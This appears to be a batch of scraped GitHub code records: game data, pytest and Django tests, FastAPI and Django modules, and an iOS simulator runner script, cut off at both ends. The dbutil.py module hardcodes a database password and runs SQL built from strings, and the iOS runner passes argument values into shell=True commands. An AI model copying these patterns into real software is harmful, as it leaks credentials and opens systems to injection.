'CANNON'},\r\n {'MOVE_POINTS': 11, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'SLAM INTO RING POST'},\r\n {'MOVE_TYPE': 1010, 'MOVE_NAME': 'ROPES'}]\r\n\r\n# Defensive Card Definitions:\r\n# 0 = B - No points on defense\r\n# 2 = A - 2 points on defense\r\n# 4 = C - 4 points on defense and neutralize offensive move\r\n# 5 = Reverse - Reverse offensive move\r\nDefensiveCard = [2, 0, 2, 5, 4, 2, 0, 2, 2, 0, 0]\r\n\r\n# Specialty Card Definitions:\r\n# 1003 = Pin attempt move (P/A)\r\n# 1004 = Submission Move (*)\r\n# 1005 = Specialty Move (S)\r\nSpecialty = { 'COMBAT CLUTCH': [ {'MOVE_POINTS': 12, 'MOVE_TYPE': 1004},\r\n {'MOVE_POINTS': 10, 'MOVE_TYPE': 1005},\r\n {'MOVE_POINTS': 13, 'MOVE_TYPE': 1005},\r\n {'MOVE_POINTS': 9, 'MOVE_TYPE': 1005},\r\n {'MOVE_POINTS': 11, 'MOVE_TYPE': 1003},\r\n {'MOVE_POINTS': 11, 'MOVE_TYPE': 1004}]}\r\n\r\n# Ropes Card Definitions:\r\n# 1003 = Pin attempt move (P/A)\r\n# 1004 = Submission Move (*)\r\n# 1005 = Specialty Move (S)\r\n# 1006 = Disqualification Move (DQ)\r\n# 1008 = Regular Offensive Move\r\n# 1009 = Grudge Match Move (XX)\r\n# 1010 = Ropes Move (ROPES)\r\n# 1014 = No Action (NA)\r\nRopes = \\\r\n[ {'MOVE_POINTS': 0, 'MOVE_TYPE': 1014, 'MOVE_NAME': 'NA'},\r\n {'MOVE_POINTS': 0, 'MOVE_TYPE': 1014, 'MOVE_NAME': 'NA'},\r\n {'MOVE_POINTS': 8, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'BODY BLOCK'},\r\n {'MOVE_POINTS': 7, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'SHOULDER BLOCK'},\r\n {'MOVE_POINTS': 0, 'MOVE_TYPE': 1014, 'MOVE_NAME': 'NA'},\r\n {'MOVE_POINTS': 9, 'MOVE_TYPE': 1003, 'MOVE_NAME': 'CANNON'},\r\n {'MOVE_POINTS': 10, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'CANNON'},\r\n {'MOVE_POINTS': 0, 'MOVE_TYPE': 1014, 'MOVE_NAME': 'NA'},\r\n {'MOVE_POINTS': 0, 'MOVE_TYPE': 1014, 'MOVE_NAME': 'NA'},\r\n {'MOVE_POINTS': 9, 'MOVE_TYPE': 1008, 'MOVE_NAME': 'CANNON'},\r\n {'MOVE_POINTS': 10, 'MOVE_TYPE': 1003, 'MOVE_NAME': 'GOMER PYLEDRIVER'}]\r\n\r\nSub = (2, 3)\r\nTagTeam = (2, 6)\r\nPriority = (5.5, 2)\r\nnameSet = \"Promoter's Dream\"\r\n","repo_name":"BackupTheBerlios/pws","sub_path":"Wrestlers/SargentSlaughter.py","file_name":"SargentSlaughter.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31010291026","text":"import pytest\nfrom unittest.mock import Mock\nfrom perry.agents.manager import AgentManager\nfrom perry.agents.base import AgentRegistry\nfrom perry.db.operations.agents import read_agent\nfrom tests.agents.fixtures import DummyAgent\nfrom datetime import datetime, timedelta\nimport freezegun\n\n\ndef mock_time():\n return datetime(2021, 1, 1)\n\n\n@pytest.fixture\ndef manager():\n yield AgentManager()\n AgentManager.reset()\n\n\n@pytest.fixture\ndef dummy_agent(test_db, add_agent_to_db, monkeypatch):\n with freezegun.freeze_time(mock_time()):\n agent_id = add_agent_to_db()\n db_agent = read_agent(test_db, agent_id)\n monkeypatch.setattr(\"perry.agents.manager.read_agent\", lambda db, id: db_agent)\n\n AgentRegistry().register_agent(DummyAgent)\n agent = DummyAgent(test_db, {\"name\": \"dummy\"}, agent_id)\n agent.save()\n monkeypatch.setattr(\"perry.agents.base.BaseAgent.load\", lambda db, id: agent)\n\n return agent\n\n\ndef test_load_agent_populates_dict(test_db, dummy_agent, manager, monkeypatch):\n test_id = 1\n agent = manager.load_agent(test_db, test_id)\n assert test_id in manager.agent_dict\n assert manager.agent_dict[test_id][\"agent\"] == agent\n\n\ndef test_load_agent_raises_error_on_missing_agent(test_db, manager, monkeypatch):\n monkeypatch.setattr(\"perry.db.operations.agents.read_agent\", lambda db, id: None)\n\n with pytest.raises(ValueError):\n manager.load_agent(test_db, -1)\n\n\ndef test_id_should_be_int(test_db, manager):\n with pytest.raises(ValueError):\n manager.load_agent(test_db, \"not_an_int\")\n\n\ndef test_remove_agent_deletes_from_dict(test_db, dummy_agent, manager, monkeypatch):\n test_id = 1\n manager.load_agent(test_db, test_id)\n assert test_id in manager.agent_dict\n manager._remove_agent(test_id)\n assert test_id not in manager.agent_dict\n\n\ndef test_reset_should_reset_state(test_db, dummy_agent, manager, monkeypatch):\n AgentManager.agent_dict = {1: \"dummy\"}\n AgentManager.expiry_queue = \"dummy\"\n AgentManager.lock = \"dummy\"\n AgentManager._cleanup_timeout = \"dummy\"\n\n manager.reset()\n\n assert manager.agent_dict == {}\n assert manager.expiry_queue.empty()\n assert manager.lock is not None\n assert isinstance(manager._cleanup_timeout, timedelta)\n\n\ndef test_remove_agent_does_not_delete_busy_agent(\n test_db, dummy_agent, manager, monkeypatch\n):\n test_id = 1\n agent = manager.load_agent(test_db, test_id)\n agent.busy = True\n manager._remove_agent(test_id)\n assert test_id in manager.agent_dict\n\n\ndef test_cleanup_removes_expired_agents(test_db, dummy_agent, manager, monkeypatch):\n mock_timer = Mock()\n monkeypatch.setattr(\"perry.agents.manager.Timer\", mock_timer)\n\n test_id = 1\n with freezegun.freeze_time(mock_time()):\n manager.load_agent(test_db, test_id)\n with freezegun.freeze_time(\n mock_time() + manager._cleanup_timeout + timedelta(seconds=1)\n ):\n manager._cleanup()\n assert test_id not in manager.agent_dict\n assert mock_timer.call_count == 1\n\n\ndef test_cleanup_keeps_unexpired_agents(test_db, dummy_agent, manager, monkeypatch):\n mock_timer = Mock()\n monkeypatch.setattr(\"perry.agents.manager.Timer\", mock_timer)\n\n test_id = 1\n with freezegun.freeze_time(mock_time()):\n manager.load_agent(test_db, test_id)\n with freezegun.freeze_time(\n mock_time() + manager._cleanup_timeout - timedelta(seconds=1)\n ):\n manager._cleanup()\n assert test_id in manager.agent_dict\n assert mock_timer.call_count == 1\n","repo_name":"mickeybeurskens/perry-doc-search","sub_path":"backend/tests/agents/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"30278756286","text":"from django.db.models.signals import post_save\nfrom django.dispatch.dispatcher import receiver\n\nfrom user.models import User\n\nfrom .models import LegalDocument, LegalDocumentTypeChoice\n\n\n@receiver(post_save, sender=LegalDocument)\ndef update_user_terms_and_privacy_acceptance_status(\n sender, instance, created, **kwargs\n):\n update_fields = kwargs.get(\"update_fields\")\n if (\n created or (update_fields and \"description\" in update_fields)\n ) and instance.document_type in [\n LegalDocumentTypeChoice.TERMS_AND_CONDITIONS,\n LegalDocumentTypeChoice.PRIVACY_POLICY,\n ]:\n User.objects.all().update(has_accepted_terms_and_privacy_policy=False)\n","repo_name":"NeatPlus/server","sub_path":"support/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"4067331648","text":"from fastapi import status,HTTPException,APIRouter\n\nfrom ..database import conn\n\nrouter=APIRouter(\n prefix=\"/dashboard\",\n tags=['Dashboard']\n)\n\n\n\n@router.get(\"/{id}\")\ndef get_dashboard(id: int):\n cursor = conn.cursor()\n cursor.execute(\n \"\"\"SELECT D.id, D.fname, D.lname, D.gender, D.phone, D.email, D.address, D.blood, D.emergency, COUNT (A.assetid),STRING_AGG(A.AssetName, ', ') AS asset_name\n FROM details D \n LEFT JOIN Asset A ON D.id = A.id \n WHERE D.id = %s \n GROUP BY D.id;\"\"\",\n (str(id),)\n )\n \n dashboard = cursor.fetchone()\n\n if not dashboard:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Employee not found\")\n \n return {'Message':'Employee and Asset data','data':dashboard}\n","repo_name":"AbhiramHalyur/Project","sub_path":"app/routers/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19592349411","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studycollab', '0015_document_owner'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='document',\n old_name='file',\n new_name='document',\n ),\n ]\n","repo_name":"anthonyuitz/uvastudycollab","sub_path":"uvastudycollab/studycollab/migrations/0016_auto_20150417_0822.py","file_name":"0016_auto_20150417_0822.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42944207129","text":"#import pymysql\n#import pymysql.cursors\nimport pymssql\n#import pymssql.cursors\n\n#Create function that takes a dictionary and makes a list from it.\ndef getKeys(columns):\n theList = []\n #print(columns)\n theDict = {}\n for item in columns:\n #theDict = {item['COLUMN_NAME']:item['Data_type']}\n theDict[item['COLUMN_NAME']] = item['Data_type']\n #theList.append(dict)\n #print('This thing: '+item['COLUMN_NAME'] + ': '+ item['Data_type'])\n #for key in item:\n #print(key)\n # theList.append(dict(item[key]))\n return theDict\n\n#connect to DB\ndef getConnection():\n connection = pymssql.connect(server='Delphi6vm\\TGISQLEX',\n user='tgia8',\n password='tgi95a8!',\n database='Autumn8')\n\n #Use this for MYSQL\n \"\"\"pymysql.connect(host='localhost',\n user='root',\n password='',\n db='baseball',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n \"\"\"\n return connection\ndef getColumns(tableName):\n connection = getConnection()\n columns =[]\n verboseCol = []\n try:\n #with connection.cursor() as cursor:\n with connection.cursor(as_dict=True) as cursor:\n sql = \"select COLUMN_NAME, Data_type from information_schema.columns where\"\n sql += \" table_name = %s\"\n cursor.execute(sql,(tableName,))\n result = cursor.fetchall()\n columns = getKeys(result)\n finally:\n connection.close()\n return columns\n\ndef prettyList(theList):\n theString = \"\"\n theCount = 0\n if len(theList) > 0:\n theString += \"'\"+theList[theCount]+\"'\"\n theCount += 1\n while theCount < len(theList) -1:\n theString += \", '\"+ theList[theCount]+\"'\"\n theCount += 1\n return theString\n\ndef insertRecord(tableName, sql):\n connection = getConnection()\n try:\n sql = addIdentityCheck(tableName,sql)\n with connection.cursor() as cursor:\n #Try to insert the records in the insert\n cursor.execute(sql)\n connection.commit()\n \n except Exception as e:\n print(sql)\n print(e)\n finally:\n connection.close()\n\ndef getValue(theType, value):\n \"\"\"Send back appropriate value given table name and value\"\"\"\n #print(theType + ': '+ value)\n #theType = ''\n #print(theType)\n if value == '':\n return 'NULL'\n else:\n \"\"\"connection = getConnection()\n try:\n with connection.cursor(as_dict = True) as cursor:\n sql = \"SELECT DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE \"\n sql += \"table_name = %s AND COLUMN_NAME = %s;\"\n cursor.execute(sql,(tableName, fieldName))\n result = cursor.fetchone()\n theType = result.get('DATA_TYPE')\n finally:\n connection.close()\"\"\"\n if theType > '':\n if theType == 'varchar' or theType == 'char' or theType =='nvarchar':\n return \"'\"+value.strip().replace(\"'\", '')+\"'\"\n elif theType == 'datetime' or theType == 'date':\n return \"'\"+value.strip()+\"'\"\n #return \"STR_TO_DATE('\"+value+\"', '% m/%d/%Y %r')\"\n elif theType == 'bit':\n if value == 'true':\n #print('yes its true')\n return '1'\n else:\n return '0'\n elif theType =='time':\n return \"'\"+value+\"'\"\n return value.strip()\ndef addIdentityCheck(tableName,sql):\n \"\"\"adds check for identity and puts in code correctly\"\"\"\n query = \"\"\"if exists(SELECT OBJECT_NAME(OBJECT_ID) AS TABLENAME \n FROM SYS.IDENTITY_COLUMNS \n WHERE OBJECT_NAME(OBJECT_ID) = '{0}')\n begin\n set identity_insert [{0}] on;\n {1}\n set identity_insert [{0}] off;\n end else\n begin\n {1}\n end\"\"\"\n return query.format(tableName, sql)\n\n","repo_name":"bcalisch/csvData","sub_path":"dbutil.py","file_name":"dbutil.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41213262065","text":"from time import sleep\n\nfrom gym_airport_tower.airport_tower_env import AirportTowerEnv\n\n# An example of the environment with rendering\n\nenv = AirportTowerEnv()\ndone = False\nenv.reset()\nenv.render()\nwhile not done:\n _, _, done, _ = env.step(env.action_space.sample())\n env.render()\n sleep(1)\nenv.close()\n","repo_name":"MarcSpeckmann/AirportTowerEnv","sub_path":"test_Env.py","file_name":"test_Env.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"70986576711","text":"import argparse\nimport logging\nimport os\nimport sys\nimport subprocess\nimport random\nimport time\nimport plistlib\nimport tempfile\n\nimport error\nimport bauer\nfrom iosinfo import IOSInfo\nfrom bauerargparser import BauerArgParser\n\n\nclass IOSRunner:\n def __init__(self, cmake):\n self.logger = logging.getLogger(__name__)\n\n self.cmake = cmake\n\n self.iosInfo = IOSInfo()\n self.ios_simulator_device_type = None\n self.ios_simulator_os = None\n self.ios_device_id = None\n\n def run(self, configuration, args):\n\n cmakeTargetToRun = self.cmake.executableTarget(args.config, args.target)\n artifactToRun = self.cmake.executableArtifactPath(cmakeTargetToRun)\n artifactToRun = artifactToRun.replace(\"${EFFECTIVE_PLATFORM_NAME}\", \"-iphonesimulator\")\n\n return self.runExecutable(artifactToRun, args)\n\n def runExecutable(self, artifactToRun, args):\n self.ios_simulator_device_type = self.iosInfo.getSelectedDeviceType(args)\n self.ios_simulator_os = self.iosInfo.getSelectedOS(args)\n self.ios_device_id = args.ios_device_id\n\n self.logger.debug(\"IOS Device type: %s\", self.ios_simulator_device_type)\n self.logger.debug(\"IOS Simulator OS: %s\", self.ios_simulator_os)\n self.logger.debug(\"IOS Device ID: %s\", self.ios_device_id)\n\n self.logger.debug(\"Executable: %s\", artifactToRun)\n\n if not artifactToRun:\n raise error.ProgramArgumentError(\"Couldn't find path to exectuable for Module %s\" % args.target)\n\n if artifactToRun.endswith('.app') and os.path.isdir(artifactToRun):\n r = self.readPList(os.path.join(artifactToRun, \"Info.plist\"))\n executable = r[\"CFBundleExecutable\"]\n artifactToRun = os.path.join(artifactToRun, executable)\n\n if not os.path.exists(artifactToRun):\n raise error.ProgramArgumentError(\"exectuable for Module %s does not exists at: %s\" % (args.target, artifactToRun))\n\n bundlePath = self.getBundlePathFromExecutable(artifactToRun)\n\n bundleId = self.getBundleIdentifier(bundlePath)\n self.logger.debug(\"Bundle Identifier: %s\", bundleId)\n\n simulatorId = None\n try:\n if self.ios_device_id != None:\n simulatorId = self.ios_device_id\n else:\n simulatorId = self.createSimulatorDevice()\n self.logger.debug(\"Simulator Id: %s\", simulatorId)\n self.bootSimulator(simulatorId)\n \n self.installApp(simulatorId, bundlePath)\n processId = self.startApp(simulatorId, bundleId, args)\n finally:\n if simulatorId and not self.ios_device_id:\n self.shutdownSimulator(simulatorId)\n\n return 0\n \n def createSimulatorDevice(self):\n simulatorName = \"bdnTestSim-\" + str(random.getrandbits(32))\n\n self.logger.debug(\"Simulator name: %s\", simulatorName)\n\n arguments = [\"xcrun\", \"simctl\", \"create\", simulatorName, \n self.ios_simulator_device_type, \n self.ios_simulator_os]\n\n simulatorId = subprocess.check_output(\" \".join(arguments), shell=True).strip().decode(encoding='utf-8')\n\n if not simulatorId or \" \" in simulatorId or \"\\n\" in simulatorId:\n raise Exception(\"Invalid simulator device ID returned.\")\n\n return simulatorId\n\n def bootSimulator(self, simulatorId):\n self.logger.info(\"Booting simulator ...\")\n subprocess.check_call(\"open -a Simulator\", shell=True)\n\n # note that this will fail if the simulator is already booted or is currently booting up.\n # That is ok.\n subprocess.call(\"xcrun simctl boot \" + simulatorId, shell=True)\n\n self.waitForSimulatorStatus(simulatorId, \"booted\", 600)\n\n def installApp(self, simulatorId, bundlePath):\n self.logger.info(\"Installing Application in simulator ...\")\n cmdLine = 'xcrun simctl install \"%s\" \"%s\"' % (simulatorId, bundlePath)\n self.logger.debug(\"Starting: %s\" %(cmdLine))\n subprocess.check_output(cmdLine, shell=True)\n\n def startApp(self, simulatorId, bundleId, args):\n self.logger.info(\"Starting Application ...\")\n\n # --console connects the app's stdout and stderr to ours and blocks indefinitely\n stdoutOptions = []\n self.stdOutFileName = \"\"\n if args.run_output_file:\n self.stdOutFileName = os.path.abspath(args.run_output_file);\n if os.path.exists(self.stdOutFileName):\n os.remove(self.stdOutFileName)\n \n self.logger.debug(\"Redirecting Applications stdout to: %s\", self.stdOutFileName)\n else:\n tf = tempfile.NamedTemporaryFile(mode='w+b', delete=False)\n self.stdOutFileName = tf.name\n\n\n arguments = [\"xcrun\", \"simctl\", \"launch\", \"--console-pty\" ] + [simulatorId, bundleId] + args.params\n\n commandLine = ' '.join('\"{0}\"'.format(arg) for arg in arguments)\n commandLine += \" > %s 2>&1 \" % (self.stdOutFileName);\n\n self.logger.debug(\"Starting: %s\" % commandLine)\n\n result = subprocess.check_call( commandLine , shell=True)\n\n if result != 0:\n self.logger.warning(\"There was an issue running the app\")\n\n try:\n with open(self.stdOutFileName) as fp:\n self.logger.info(\"Application output:\\n\\n%s\" % (fp.read()))\n except:\n pass\n\n if not args.run_output_file:\n os.remove(self.stdOutFileName)\n\n\n #def waitForAppToExit(self, simulatorId, processId, bundleId):\n # self.logger.info(\"Waiting for simulated process %s to exit ...\", processId)\n\n # while True:\n # processListOutput = subprocess.check_output('xcrun simctl spawn \"%s\" launchctl list' % simulatorId, shell=True).decode(encoding='utf-8')\n\n # foundProcess = False\n # for line in processListOutput.splitlines():\n\n # words = line.split()\n\n # if words[0]==processId and bundleId in str(line):\n # foundProcess = True\n # break\n\n # if not foundProcess:\n # self.logger.info(\"Process inside simulator has exited.\")\n # break\n\n # time.sleep(2)\n\n\n def shutdownSimulator(self, simulatorId):\n self.logger.info(\"Shutting down simulator\");\n subprocess.call('xcrun simctl shutdown \"%s\"' % simulatorId, shell=True );\n # note that shutdown automatically waits until the simulator has finished shutting down\n\n self.logger.info(\"Deleting simulator device.\");\n subprocess.call('xcrun simctl delete \"%s\"' % simulatorId, shell=True)\n\n def waitForSimulatorStatus(self, simulatorId, wait_for_status, timeout_seconds):\n timeout_time = time.time()+timeout_seconds\n while True:\n\n status = self.getSimulatorStatus(simulatorId)\n if not status:\n raise Exception(\"Unable to get simulator status.\")\n\n self.logger.debug(\"Simulator status: %s\", status);\n\n if status==wait_for_status:\n break\n\n if time.time() > timeout_time:\n raise Exception(\"Simulator has not reached desired status in %d seconds - timing out.\" % timeout_seconds)\n\n time.sleep(1)\n\n def getSimulatorStatus(self, simulatorId):\n output = subprocess.check_output(\"xcrun simctl list\", shell=True).decode(encoding='utf-8')\n\n search_for = \"(\"+simulatorId+\")\"\n\n for line in output.splitlines():\n if search_for in line:\n before, sep, status = line.rpartition(\"(\")\n if sep:\n status, sep, after = status.partition(\")\")\n if sep and status:\n return status.lower()\n\n return None\n\n def getBundlePathFromExecutable(self, executablePath):\n bundlePath = os.path.abspath(os.path.join( executablePath, \"..\"))\n return bundlePath\n\n def readPList(self, plistPath):\n self.logger.info(\"Reading plist at %s\", plistPath)\n if sys.version_info >= (3, 0):\n return plistlib.load( open(plistPath, \"rb\") )\n else:\n tf = tempfile.NamedTemporaryFile(mode='w+b', delete=False)\n os.system('plutil -convert xml1 %s -o %s' % (plistPath,tf.name))\n return plistlib.readPlist(open(tf.name, \"rb\"))\n\n def getBundleIdentifier(self, bundlePath):\n plistPath = os.path.abspath(os.path.join( bundlePath, \"Info.plist\"))\n\n r = self.readPList(plistPath)\n\n return r[\"CFBundleIdentifier\"] \n\ndef main():\n bauer.setupLogging(sys.argv)\n\n argParser = BauerArgParser(None, None)\n parser = argparse.ArgumentParser()\n argParser.setBaseParser(parser)\n\n parser.add_argument('-t', '--target', help='path to the ios app to run', required=True)\n argParser.addSimulatorArguments(parser)\n argParser.addIOSSimulatorArguments(parser)\n argParser.buildGlobalArguments([parser])\n argParser.addParams(parser)\n args = parser.parse_args()\n\n runner = IOSRunner(None)\n runner.runExecutable(args.target, args)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AshampooSystems/boden","sub_path":"bauer/iosrunner.py","file_name":"iosrunner.py","file_ext":"py","file_size_in_byte":9171,"program_lang":"python","lang":"en","doc_type":"code","stars":1609,"dataset":"github-code","pt":"27"} +{"seq_id":"41235416904","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\nfrom core.models import *\n\nclass ItemViewSetTestCase(TestCase):\n def setUp(self):\n self.client = APIClient()\n\n def test_list_items(self):\n url = reverse('item-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_retrieve_item(self):\n item = Item.objects.create(name='Test Item')\n url = reverse('item-detail', args=[item.pk])\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_create_item(self):\n url = reverse('item-list')\n data = {'name': 'New Item'}\n response = self.client.post(url, data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_update_item(self):\n item = Item.objects.create(name='Old Name')\n url = reverse('item-detail', args=[item.pk])\n data = {'name': 'New Name'}\n response = self.client.patch(url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['name'], 'New Name')\n\n def test_delete_item(self):\n item = Item.objects.create(name='Test Item')\n url = reverse('item-detail', args=[item.pk])\n response = self.client.delete(url)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertFalse(Item.objects.filter(pk=item.pk).exists())\n\n # Add more tests as needed\n\n\nclass ShiftViewSetTestCase(TestCase):\n def setUp(self):\n self.client = APIClient()\n\n def test_list_shifts(self):\n url = reverse('shift-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_retrieve_shift(self):\n shift = Shift.objects.create()\n url = reverse('shift-detail', args=[shift.pk])\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_create_shift(self):\n url = reverse('shift-list')\n data = {} # Add the required data for creating a shift\n response = self.client.post(url, data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_update_shift(self):\n shift = Shift.objects.create()\n url = reverse('shift-detail', args=[shift.pk])\n data = {} # Add the data to update the shift\n response = self.client.patch(url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n # Add assertions for updated data\n\n def test_delete_shift(self):\n shift = Shift.objects.create()\n url = reverse('shift-detail', args=[shift.pk])\n response = self.client.delete(url)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertFalse(Shift.objects.filter(pk=shift.pk).exists())\n\n # Add more tests as needed\n\n\nclass ReservationViewSetTestCase(TestCase):\n def setUp(self):\n self.client = APIClient()\n\n def test_list_reservations(self):\n url = reverse('reservation-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_retrieve_reservation(self):\n reservation = Reservation.objects.create()\n url = reverse('reservation-detail', args=[reservation.pk])\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_create_reservation(self):\n url = reverse('reservation-list')\n data = {} # Add the required data for creating a reservation\n response = self.client.post(url, data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_update_reservation(self):\n reservation = Reservation.objects.create()\n url = reverse('reservation-detail', args=[reservation.pk])\n data = {} # Add the data to update the reservation\n response = self.client.patch(url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n # Add assertions for updated data\n\n def test_delete_reservation(self):\n reservation = Reservation.objects.create()\n url = reverse('reservation-detail', args=[reservation.pk])\n response = self.client.delete(url)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertFalse(Reservation.objects.filter(pk=reservation.pk).exists())\n\n # Add more tests as needed\n\n\n\n\n#--------------------------------serializers-----------------------------------------\n\n\n\nfrom django.test import TestCase\nfrom core.models import Item, Shift, Reservation, Service, Category\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom .serializers import *\n\nUser = get_user_model()\n\n\nclass SerializerTestCase(TestCase):\n def setUp(self):\n self.category = Category.objects.create(name='Test Category')\n self.service = Service.objects.create(\n name='Test Service', duration=datetime.timedelta(minutes=15), price=10.0\n )\n self.user = User.objects.create_user(\n username='testuser',\n email='test@example.com',\n password='testpassword',\n phone_number='1234567890',\n )\n self.item = Item.objects.create(\n name='Test Item',\n category=self.category,\n description='Test Description',\n )\n self.shift = Shift.objects.create(\n item=self.item,\n is_available=True,\n start_date=datetime.datetime.now(),\n end_date=datetime.datetime.now() + datetime.timedelta(hours=1),\n repeat='do not repeat',\n n_time_repeat=1,\n )\n self.reservation = Reservation.objects.create(\n reserver=self.user,\n item=self.item,\n shift=self.shift,\n service=self.service,\n time_date=datetime.datetime.now(),\n code='ABC123',\n )\n\n def test_item_serializer(self):\n serializer = ItemSerializer(instance=self.item)\n expected_fields = ['id', 'name', 'category', 'description', 'image', 'experience', 'phone_number', 'last_name', 'first_name']\n self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n def test_category_serializer(self):\n serializer = CategorySerializer(instance=self.category)\n expected_fields = ['id', 'name']\n self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n def test_shift_serializer(self):\n serializer = ShiftSerializer(instance=self.shift)\n expected_fields = ['id', 'start_date', 'end_date', 'repeat', 'shift', 'services', 'item', 'is_available']\n self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n def test_reservation_serializer(self):\n serializer = ReservationSerializer(instance=self.reservation)\n expected_fields = ['id', 'reserver', 'time_date', 'service', 'shift', 'item', 'code', 'status']\n self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n def test_service_serializer(self):\n serializer = ServiceSerializer(instance=self.service)\n expected_fields = ['id', 'name', 'duration', 'price', 'subtitle']\n self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n def test_custom_user_serializer(self):\n serializer = CustomUserSerializer(instance=self.user)\n expected_fields = ['id', 'username', 'email', 'first_name', 'last_name', 'phone_number']\n self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n def test_custom_user_create_serializer(self):\n data = {\n 'username': 'newuser',\n 'email': 'newuser@example.com',\n 'password': 'newpassword',\n 'phone_number': '0987654321',\n }\n serializer = CustomUserCreateSerializer(data=data)\n self.assertTrue(serializer.is_valid())\n validated_data = serializer.validated_data\n self.assertEqual(validated_data['username'], 'newuser')\n self.assertEqual(validated_data['email'], 'newuser@example.com')\n self.assertEqual(validated_data['phone_number'], '0987654321')\n\n def test_time_serializer(self):\n data = {'time': datetime.time(hour=9, minute=30)}\n serializer = TimeSerializer(data=data)\n self.assertTrue(serializer.is_valid())\n validated_data = serializer.validated_data\n self.assertEqual(validated_data['time'], datetime.time(hour=9, minute=30))\n\n\n self.assertEqual(validated_data['time'], datetime.time(hour=9, minute=30))\n\n\n# Add the following tests to the SerializerTestCase class\n\n def test_custom_user_serializer(self):\n serializer = CustomUserSerializer(instance=self.user)\n expected_fields = ['id', 'username', 'email', 'first_name', 'last_name', 'phone_number']\n self.assertEqual(set(serializer.data.keys()), set(expected_fields))\n\n def test_custom_user_create_serializer(self):\n data = {\n 'username': 'newuser',\n 'email': 'newuser@example.com',\n 'password': 'newpassword',\n 'phone_number': '0987654321',\n }\n serializer = CustomUserCreateSerializer(data=data)\n self.assertTrue(serializer.is_valid())\n validated_data = serializer.validated_data\n self.assertEqual(validated_data['username'], 'newuser')\n self.assertEqual(validated_data['email'], 'newuser@example.com')\n self.assertEqual(validated_data['phone_number'], '0987654321')\n\n def test_time_serializer(self):\n data = {'time': datetime.time(hour=9, minute=30)}\n serializer = TimeSerializer(data=data)\n self.assertTrue(serializer.is_valid())\n validated_data = serializer.validated_data\n self.assertEqual(validated_data['time'], datetime.time(hour=9, minute=30))\n\n\n\n#----------------------sending email -------------------------------\n\nfrom django.test import TestCase\nfrom unittest.mock import patch\nfrom . import send_mail\n\nclass EmailSendingTestCase(TestCase):\n @patch('smtplib.SMTP')\n def test_send_mail(self, mock_smtp):\n from_email = 'sender@example.com'\n to_emails = ['recipient@example.com']\n subject = 'Test Email'\n html = 'ABC123'\n\n send_mail(html, subject=subject, from_email=from_email, to_emails=to_emails)\n\n # Assert that the SMTP instance was called with the correct arguments\n mock_smtp.assert_called_once_with(host='smtp.gmail.com', port=587)\n smtp_instance = mock_smtp.return_value\n smtp_instance.ehlo.assert_called_once()\n smtp_instance.starttls.assert_called_once()\n smtp_instance.login.assert_called_once_with(username=globals.USERNAME, password=globals.PASSWORD)\n smtp_instance.sendmail.assert_called_once_with(from_email, to_emails, mock_smtp.return_value.sendmail.return_value)\n smtp_instance.quit.assert_called_once()\n","repo_name":"saleh-bool/oop-back","sub_path":"main/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12462991113","text":"import datetime\nimport re\nimport 